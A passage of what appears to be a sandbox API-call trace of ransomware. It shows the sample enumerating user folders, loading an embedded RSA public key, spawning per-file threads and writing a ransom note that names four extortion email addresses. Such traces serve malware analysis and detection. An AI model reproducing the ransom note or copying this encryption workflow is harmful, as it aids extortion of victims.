FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.792] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0032.792] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0032.792] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.792] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.792] lstrcatW (in: lpString1="C:\\", lpString2="Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0032.792] SetErrorMode (uMode=0x1) returned 0x1 [0032.792] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0032.792] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0032.792] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0032.792] lstrcatW (in: lpString1="C:\\Users\\", lpString2="*.*" | out: lpString1="C:\\Users\\*.*") returned="C:\\Users\\*.*" [0032.792] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.792] PathFindFileNameW (pszPath="C:\\Users") returned="Users" [0032.792] lstrcpyW (in: lpString1=0x17e824, lpString2="Users" | out: lpString1="Users") returned="Users" [0032.792] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.792] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.792] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.792] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.792] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.792] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.792] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0032.792] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0032.792] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0032.792] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0032.792] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0032.792] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0032.792] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0032.792] StrStrW (lpFirst="C:\\Users\\", lpSrch="Desktop") returned 0x0 [0032.792] StrStrW (lpFirst="C:\\Users\\", lpSrch="DESKTOP") returned 0x0 [0032.792] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\") returned 13 [0032.792] lstrcpyA (in: lpString1=0x17ea5c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0032.792] lstrcpyW (in: lpString1=0x17f05c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0032.792] lstrcpyW (in: lpString1=0x17ec5c, lpString2="\\\\?\\C:\\Users\\" | out: lpString1="\\\\?\\C:\\Users\\") returned="\\\\?\\C:\\Users\\" [0032.792] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17ea5c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0032.793] Sleep (dwMilliseconds=0x96) [0032.990] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.990] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.990] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0032.990] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0032.990] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0032.990] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0032.990] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.990] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 0 [0032.990] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0032.990] lstrcatW (in: lpString1="C:\\Users", lpString2="\\*.*" | out: lpString1="C:\\Users\\*.*") returned="C:\\Users\\*.*" [0032.990] StrStrW (lpFirst="C:\\Users\\", lpSrch="Desktop") returned 0x0 [0032.990] StrStrW (lpFirst="C:\\Users\\", lpSrch="DESKTOP") returned 0x0 [0032.990] SetErrorMode (uMode=0x1) returned 0x1 [0032.990] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\_HELP_INSTRUCTION.TXT") returned 30 [0032.990] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.991] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.991] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x394) returned 0x0 [0032.991] RegQueryValueExW (in: hKey=0x394, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd90f8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3dd90f8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.991] RegCloseKey (hKey=0x394) returned 0x0 [0032.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.991] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.991] CreateFileW (lpFileName="C:\\Users\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0032.991] CloseHandle (hObject=0x394) returned 1 [0032.991] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.991] PathFindFileNameW (pszPath="C:\\Users") returned="Users" [0032.991] lstrcpyW (in: lpString1=0x17e824, lpString2="Users" | out: lpString1="Users") returned="Users" [0032.991] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0032.991] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0032.991] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.991] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0032.991] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.991] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0032.991] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0032.991] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0032.991] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0032.991] lstrcatW (in: lpString1="C:\\Users\\", lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0032.991] SetErrorMode (uMode=0x1) returned 0x1 [0032.991] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0032.991] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0032.991] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0032.992] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0032.992] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x324738 [0032.992] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0032.992] lstrcpyW (in: lpString1=0x17d784, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.992] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0032.992] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0032.992] StrStrW (lpFirst="NTUSER.DAT", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0032.992] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntldr") returned 0x0 [0032.992] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTLDR") returned 0x0 [0032.992] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTDETECT.COM") returned 0x0 [0032.992] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntdetect.com") returned 0x0 [0032.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0032.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0032.992] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0032.992] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0032.992] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0032.992] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0032.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3cc [0032.993] Sleep (dwMilliseconds=0x96) [0033.148] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0033.148] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="..") returned 1 [0033.148] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2=".") returned 1 [0033.148] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0033.148] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="ntldr") returned 0x0 [0033.148] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="NTLDR") returned 0x0 [0033.148] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="NTDETECT.COM") returned 0x0 [0033.148] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="ntdetect.com") returned 0x0 [0033.148] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0033.148] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0033.148] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0033.148] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.148] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0033.148] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.148] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3a8 [0033.149] Sleep (dwMilliseconds=0x96) [0033.349] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0033.349] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="..") returned 1 [0033.349] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2=".") returned 1 [0033.349] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0033.349] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="ntldr") returned 0x0 [0033.349] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="NTLDR") returned 0x0 [0033.349] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="NTDETECT.COM") returned 0x0 [0033.349] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="ntdetect.com") returned 0x0 [0033.349] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0033.349] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0033.349] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0033.349] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.349] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0033.349] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3a4 [0033.349] Sleep (dwMilliseconds=0x96) [0033.505] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0033.505] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="..") returned 1 [0033.505] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".") returned 1 [0033.505] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0033.505] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntldr") returned 0x0 [0033.505] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTLDR") returned 0x0 [0033.505] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTDETECT.COM") returned 0x0 [0033.505] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntdetect.com") returned 0x0 [0033.505] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0033.505] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0033.505] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0033.505] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.505] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0033.505] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.505] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x39c [0033.506] Sleep (dwMilliseconds=0x96) [0033.661] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0033.661] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0033.661] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0033.661] 